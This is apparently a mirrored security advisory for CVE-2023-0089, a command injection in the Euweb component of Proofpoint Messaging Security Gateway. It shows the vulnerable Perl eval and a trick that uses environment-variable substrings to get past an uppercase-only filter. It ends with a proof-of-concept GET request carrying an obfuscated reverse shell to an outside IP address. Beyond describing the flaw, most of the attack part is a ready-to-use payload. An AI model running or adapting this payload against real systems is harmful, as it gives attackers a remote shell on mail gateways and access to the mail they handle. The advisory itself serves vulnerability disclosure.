Share
## https://sploitus.com/exploit?id=PACKETSTORM:225274
# About
    
    Security researcher: ly1g3, ly1g3[at]tuta.io 
    
    GPG fingerprint: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586
    
    Overview: Remote Code Execution - Low level authenticated user to admin RCE
    
    CVE: CVE-2023-0089
    
    Timeline:
    * Discovered - ly1g3
    * Reported - ly1g3
    * Fixed - Proofpoint
    
    # Proofpoint Messaging Security Gateway 8.18.4.73-8.18.4.73 
    Exploits for Proofpoint Messaging Security Gateway
    
    ## Remote Code Execution (RCE)
    A low level (authenticated) user of the Euweb can gain arbitrary code execution with admin privileges.
    
    
    ## Technical
    
    The `getMsgType` function in the `Euwebutils.pm` is vulnerable to command injection. The `$module` variable comes from a get parameter and no sanitization is applied to this user input.
    
    ```perl
    sub getMsgType {
    ...
    else {
    		$msgtype = eval "Proofpoint::Digest::PROOFPOINT_MAIL_REPORT_MSGTYPE_".uc($module);
    	}
    
    ```
    
    This `getMsgType` function is used by many API calls used by the Euweb application, so the exploit can be triggered in many ways.
    
    Since all chars must be uppercase environment variables can be used to bypass this restriction for lower case letters. Example: `${SHELL:1:1}` instead of `b` 
    
    Since `use strict` is used `MAIL_GENERAL()` can be added to the beginning of the string to complete `PROOFPOINT_MAIL_REPORT_MSGTYPE_`. After this custom perl code can be added.
    
    Example payload unencoded: ```MAIL_GENERAL();`id` ```
    
    
    
    ## POC
    Reverse shell encoded using environment variables to bypass lower case restrictions. Code run as `pps` user.
    ```yaml
    GET /euweb/euweb?cmd=x_releasemsg&id=0&func=ReleaseMsg&entries=23%3A23%3A12&eid=3&module=MAIL_GENERAL()%3b`/\${SHELL%3a1%3a1}\${SHELL%3a2%3a1}\${LANG%3a1%3a1}/\${USER%3a2%3a1}\${SHELL%3a8%3a1}+-\${SHELL%3a2%3a1}+>%26+/\${SSH_TTY%3a1%3a1}\${TERM%3a2%3a1}\${MAIL%3a1%3a1}/\${TERM%3a1%3a1}\${TERM%3a9%3a1}\${USER%3a0%3a1}/192.168.80.81/443+0>%261`